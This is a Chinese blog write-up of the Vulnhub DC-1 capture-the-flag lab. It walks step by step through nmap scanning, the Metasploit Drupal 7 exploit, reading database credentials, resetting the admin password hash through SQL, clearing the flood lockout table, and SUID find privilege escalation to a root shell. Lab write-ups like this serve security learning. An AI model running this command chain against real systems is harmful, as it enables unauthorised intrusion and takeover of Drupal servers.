首页 > 其他分享 >Vulnhub DC-1

Vulnhub DC-1

时间:2025-01-17 18:05:12浏览次数:1  
标签:www hash DC sh Vulnhub scripts var password

Vulnhub DC-1

第一次接触渗透。全程按照师傅操作。

预备

导入被攻击机,配置网络为同一模式,保证和kali在同一网段。已知共5个flag。

渗透

nmap -sP 192.168.9.0/24

找到被攻击机ip之后进行端口扫描

nmap -p- 192.168.9.130

发现开启22端口和80端口

根据wapplyzer插件可知cms为drupal 7

尝试msf

msfconsole#启动msf
search drupal#搜索漏洞
use 1#选择漏洞
show options
set RHOSTS 192.168.9.130#设置空余选项
exploit#启动攻击
shell
python -c 'import pty;pty.spawn("/bin/bash")'#启动交互式

拿下第一个flag

Every good CMS needs a config file - and so do you.

提示配置文件,进入站点目录sites

在settings.php中拿到flag2

 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?

下面可以看到数据库信息,尝试连接数据库

mysql -udbuser -pR0ck3t

尝试修改admin密码来登录后台。去找加密逻辑。

在scripts文件夹下的password-hash.sh找到加密逻辑,运行尝试替换。

出现报错如下

www-data@DC-1:/var/www/scripts$ ./password-hash.sh "123456"
./password-hash.sh "123456"
PHP Warning:  include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 84
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/bootstrap.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 84
PHP Fatal error:  Call to undefined function user_hash_password() in /var/www/scripts/password-hash.sh on line 87

说明password.inc不在目录下,将整个includes文件夹复制到scripts目录下重新执行即可。或者用root选项执行指定drupal根目录即可解决问题

www-data@DC-1:/var/www/scripts$ ./password-hash.sh --root "/var/www" "123456"
./password-hash.sh --root "/var/www" "123456"

password: 123456                hash: $S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau

更行数据库登录后台

update users set pass='$S$DhKZsxG0S3dHz/X37deB08I7W/2PsIRFeZ6Tc5cQ29SRRFLxXVau' where name = 'admin';

由于我之前瞎试了超过5次,会锁ip一段时间,可以在数据库输入truncate flood就可以再试了。

在后台content中发现flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

提示看shadow文件,需要进行提权。

提权

find / -perm -4000 2>/dev/null

查看具有suid权限程序。发现find具有suid权限,利用find命令进行提权

touch tourist
find / -name tourist -exec "/bin/sh" \;

在根目录下拿到flag5

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

对于flag4在/etc/passwd中发现存在flag4用户,进入flag4家目录即可得到flag4。

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

标签:www,hash,DC,sh,Vulnhub,scripts,var,password
From: https://www.cnblogs.com/chang-room/p/18677447

相关文章

  • Vulnhub-Tr0ll靶机笔记
    Tr0ll靶机笔记概述靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/这台靶机比较简单,让我们开始Hackit!一、nmap扫描1、端口扫描sudonmap-sT--min-rate10000-p-192.168.52.6-oportsNmapscanreportfor192.168.52.6Hostisup(0.0026slatency).Notsh......
  • ReadCat阅读器吾爱置顶的神器,好评如潮速度收藏!(附书源)
            你是否还能回想起曾经在课堂上偷偷看小说的时光呢?那种既紧张又兴奋的情绪,就好像刚刚发生过一样。小说于我们而言,不但是舒缓情绪的妙方,更是我们精神世界不可或缺的一部分。 瞧,如今我们已不必再在桌下偷偷摸摸看小说了,可打工人忙碌的生活却让我们很难有时间尽......
  • 条件卷积condconv模型详解及代码复现
    基本原理条件卷积(CondConv)是一种创新的卷积方法,它通过动态计算卷积核来克服传统静态卷积的局限性。这种方法的核心思想是将卷积核参数化为多个专家(卷积核)的线性组合,具体公式如下:Output(x)=σ((α1⋅W1+...+αn⋅Wn)∗x)在这个公式中:x:表示输入特征图αi:是通过可学......
  • e2studio开发RA0E1(17)----ADC单通道采集电压
    e2studio开发RA0E1.17--ADC单通道采集电压概述视频教学样品申请完整代码下载硬件准备参考程序新建工程工程模板保存工程路径芯片配置工程模板选择时钟设置UART配置UART属性配置设置e2studio堆栈e2studio的重定向printf设置R_UARTA_Open()函数原型回调函数user_uart_callb......
  • 32ADC单通道连续模式只能采样一次问题,adc值不更新( CUBMX+HAL)
    1.问题使用ADC2,单通道(IN15)连续模式cubemx配置如下在main.c中添加如下函数结果adc_value的值只有复位时有效,然后值一直不变(IN15的IO口接了个电压值不断变换的信号)2.解决只要在cubemx中使能LowPowerAutoWait,代码不变,即可正常工作......
  • ADC
    、ADC简介1.1采样定理1.2模式介绍扫描模式:使用STM32CUBEMX配置了多通道后,这一项默认开启且无法设置成关闭。这个模式就是自动扫描你开启的所有通道进行转换,直至转换完。例如你开启了CH0、CH1、CH2、CH3这四个通道,启动转换后ADC会自动将这4个通道全部转换完,但是这种连续性是可以......
  • DevExpress gridControl 绑定数据源之后添加非绑定列
    using(DevExpress.Utils.WaitDialogFormdlg=newDevExpress.Utils.WaitDialogForm("请稍等","查询中......",newSystem.Drawing.Size(100,50))){stringsqlString="SELECTITEM,DESCRIPTION,CATEGORY3FROMW......
  • STM32H723 ADC 差分与单端转换
    1、配置ADC2、配置DMA 3、DMA转换数据到数组/*USERCODEBEGINHeader_StartTaskModbus*/#defineADC_BUFFER_SIZE8//根据规则通道数调整uint32_tadc_buffer[ADC_BUFFER_SIZE];//ADC采样结果缓冲区/***@briefFunctionimplementingthemyTaskModbusthrea......
  • 《无主之地4》d3dcompiler_47.dll缺失怎么修复
    当你在运行《无主之地4》时遇到d3dcompiler_47.dll缺失的问题,这通常是因为你的系统缺少了DirectX的一部分文件。以下是几种可能的解决方法:方法一:安装或更新DirectX1.下载并安装最新的DirectX:•访问微软官方网站下载最新的DirectXEnd-UserRuntimeWebInstaller。•下载......
  • 复现渗透Vulnhub-VulnOSv2靶机
    本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列VulnOSv2靶机有一定的了解一、信息收集阶段靶机地址:https://download.vulnhub.com/vulnos/VulnOSv2.7z因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99